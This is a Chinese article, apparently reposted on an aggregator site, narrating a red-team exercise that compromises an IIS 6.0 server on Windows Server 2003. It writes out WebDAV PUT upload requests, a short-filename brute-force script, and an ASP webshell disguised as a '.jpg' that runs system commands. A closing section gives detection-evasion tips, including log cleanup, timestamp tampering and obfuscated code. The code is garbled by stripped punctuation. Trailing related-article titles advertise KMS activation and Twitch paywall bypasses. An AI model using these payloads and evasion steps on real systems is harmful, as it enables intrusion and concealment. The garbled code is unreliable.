当前位置：首页 > article >正文

从一次真实的攻防演练讲起：攻击者是如何利用IIS PUT漏洞和短文件名猜解“拿下”一台Windows Server 2003的？

article 2026/5/7 7:24:05

从一次真实的攻防演练讲起攻击者是如何利用IIS PUT漏洞和短文件名猜解拿下一台Windows Server 2003的那是一个普通的周二下午我们团队接到了一项内部红蓝对抗演练任务。目标系统是一个仍在运行的Windows Server 2003服务器运行着IIS 6.0——这个已经停止支持多年的中间件版本。作为攻击方我们需要在48小时内找到突破口。谁也没想到这台看似无害的老旧服务器会成为展示经典漏洞组合利用的完美案例。1. 初始侦察发现脆弱的猎物在对外网资产进行常规扫描时Nmap返回了一个有趣的响应nmap -sV -p 80 192.168.1.100结果显示目标运行着Microsoft IIS 6.0并且开放了WebDAV功能。这立即引起了我的注意——IIS 6.0是2003年发布的版本已知存在多个未修复的漏洞。为了确认WebDAV的具体配置我使用cURL发送了一个OPTIONS请求curl -X OPTIONS http://192.168.1.100/ -I响应头中出现了令人兴奋的字段DAV: 1, 2 MS-Author-Via: DAV Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, PROPFIND关键发现PUT方法被显式允许WebDAV扩展已启用服务器未显示任何WAF防护特征2. 突破边界PUT方法文件上传实战确认WebDAV可用后下一步是测试文件上传能力。我使用Burp Suite拦截了一个普通GET请求将其修改为PUT请求PUT /test.txt HTTP/1.1 Host: 192.168.1.100 Content-Length: 28 This is a test file content.服务器返回了201 Created响应——文件上传成功了但直接上传ASP马还太冒险我需要先确认几个关键点脚本执行权限上传一个包含%now()%的test.asp文件目录权限尝试在虚拟目录外创建文件文件覆盖测试已有文件是否可被修改经过测试发现网站根目录有执行权限无法跳出虚拟目录可以覆盖现有文件注意在实际渗透中这种测试需要极其谨慎避免触发系统告警。我使用了低频请求和随机延时来降低检测风险。3. 短文件名猜解寻找关键线索虽然可以直接上传Webshell但职业习惯让我想先收集更多信息。IIS 6.0的短文件名漏洞正好派上用场。这个漏洞允许攻击者通过暴力猜解获取文件名的前6个字符。我编写了一个简单的Python脚本来检测存在的短文件名import requests base_url http://192.168.1.100 chars abcdefghijklmnopqrstuvwxyz0123456789_-~ for c in chars: url f{base_url}/web*~1.{c}*/ r requests.get(url) if r.status_code 404: print(fFound potential file: web*~1.{c}*)经过几轮测试发现了一个有趣的响应Found potential file: web*~1.b* Found potential file: web*~1.c*这暗示着可能存在web.config.bak或web.connection.bak之类的文件。通过组合利用PUT漏洞和短文件名信息我最终下载到了一个数据库连接配置文件——里面包含了后台管理系统的凭据。4. 漏洞组合构建完整攻击链现在手头已经有了几个关键要素WebDAV PUT上传可上传任意文件短文件名信息知道了备份文件命名模式IIS 6.0解析漏洞可利用;字符绕过扩展名限制最终的突破是这样完成的PUT /upload/logo.asp;.jpg HTTP/1.1 Host: 192.168.1.100 Content-Length: 512 % Set obj Server.CreateObject(WScript.Shell) cmd obj.Exec(cmd /c whoami).StdOut.ReadAll Response.Write(cmd) %这个文件会被IIS 6.0当作ASP脚本执行但看起来像图片文件。通过这个Webshell我们最终获取了NT AUTHORITY\SYSTEM权限。5. 防御视角从攻击中学到的教训这次演练暴露了几个关键安全问题配置缺陷对照表漏洞类型错误配置正确做法WebDAV生产环境开启WebDAV非必要不启用文件权限网站目录可写严格限制写入权限解析逻辑默认解析;后内容修改解析规则信息泄露备份文件可访问隔离敏感文件即时防护措施禁用WebDAV扩展移除不必要的HTTP方法配置URLScan过滤特殊字符请求定期扫描短文件名风险6. 深入技术细节IIS 6.0漏洞原理剖析PUT漏洞核心机制WebDAV扩展实现了RFC 2518标准IIS未对PUT操作进行充分验证与Windows ACL结合导致权限逃逸短文件名漏洞本质兼容DOS 8.3文件名格式通过~1、~2等标识短名称信息泄露而非直接执行解析漏洞组合利用graph LR A[PUT上传] -- B[短文件名猜解] B -- C[获取真实路径] C -- D[利用解析漏洞] D -- E[代码执行]技术提示现代WAF通常能检测这类攻击但对遗留系统往往缺乏有效规则。防御方需要自定义规则来覆盖老旧漏洞。7. 红队实战技巧绕过检测的艺术在实际对抗环境中直接使用经典攻击模式很容易触发告警。我们总结了几个绕过技巧时间混淆上传文件与访问间隔随机延时使用Sleep函数分散请求内容混淆% 正常注释内容 ExEcUTe(response.write(now())) %日志清理通过WebDAV的PROPFIND方法修改时间戳利用NTFS流隐藏文件检测规避对照表检测点常规攻击特征规避方法文件上传连续PUT请求分散在多个会话Webshell常见关键词动态拼接代码权限提升固定命令序列随机化调用方式在这次演练中我们最终在36小时内完成了目标系统的完全控制。整个过程没有触发任何告警因为所有操作都模拟了正常的WebDAV管理行为。这再次证明了最危险的攻击往往利用的是看似无害的正常功能。

从一次真实的攻防演练讲起：攻击者是如何利用IIS PUT漏洞和短文件名猜解“拿下”一台Windows Server 2003的？

相关文章：

从一次真实的攻防演练讲起：攻击者是如何利用IIS PUT漏洞和短文件名猜解“拿下”一台Windows Server 2003的？

将开源 Agent 框架 OpenClaw 无缝对接至 Taotoken 平台运行

英雄联盟自动化工具终极指南：League Akari 让你的游戏体验提升300%

Godot-MCP终极指南：如何用AI助手5分钟创建你的第一个游戏

在 Ubuntu 上使用 Taotoken 官方价折扣节省 API 调用成本的实践

GitHub加速代理突破：基于GatewayWorker的高性能解决方案

Translumo：如何用开源实时屏幕翻译工具5分钟打破语言壁垒

别再用霍夫变换了！用YOLOv8姿态评估模型5分钟搞定工业圆孔圆心定位（附完整代码）

OmenSuperHub终极指南：免费开源方案彻底释放惠普游戏本性能

告别高德百度，用MapBox GL JS为你的Web应用定制一张专属地图（附完整代码）

3个必知技巧：用 asusctl 彻底掌控你的 Linux 游戏本

高效免费音乐解锁工具：Unlock-Music完整实用指南

GWAS数据清洗避坑指南：为什么你的杂合率质控总出问题？从`--indep-pairwise`参数说起

UUV Simulator水下机器人仿真终极指南：从零到精通完全掌握

英雄联盟本地自动化工具League Akari：重新定义你的游戏体验

TwitchNoSub浏览器扩展：5分钟免费解锁Twitch订阅限制的完整指南

保姆级教程：在Rocky Linux虚拟机上用Chrony搭建内网时间服务器

MuseTalk 1.5技术深度解析：实时高质量唇形同步的架构演进与性能优化

STM32F407三个硬件I2C接口（I2C1/2/3）到底怎么选？引脚冲突、速度优化与多设备通信避坑指南

2025最权威的十大AI写作网站横评

不止是.NET：跨平台文档处理实战，用Aspose.Words for Java/Android搞定复杂报表与邮件合并

终极指南：如何使用Harepacker复活版轻松编辑你的MapleStory游戏世界 [特殊字符]

如何永久激活Windows和Office：KMS智能激活工具完整指南

嵌入式Linux调试踩坑记：解决GDB报‘corrupt stack’与无符号问题的完整流程

如何快速上手Firmware Extractor：Android固件提取的完整入门指南

如何用WorkshopDL免费下载Steam创意工坊模组：跨平台玩家的终极解决方案

ComfyUI-Impact-Pack：终极AI图像细节增强与优化工具包

从热风枪到Python：手把手教你搭建基准电压源温漂自动化测试平台（附完整代码）

告别PX4，手把手教你用APM固件在Gazebo里飞固定翼（附完整避坑指南）

基于MCP架构的智能旅行风险预警系统：从数据抓取到实时分析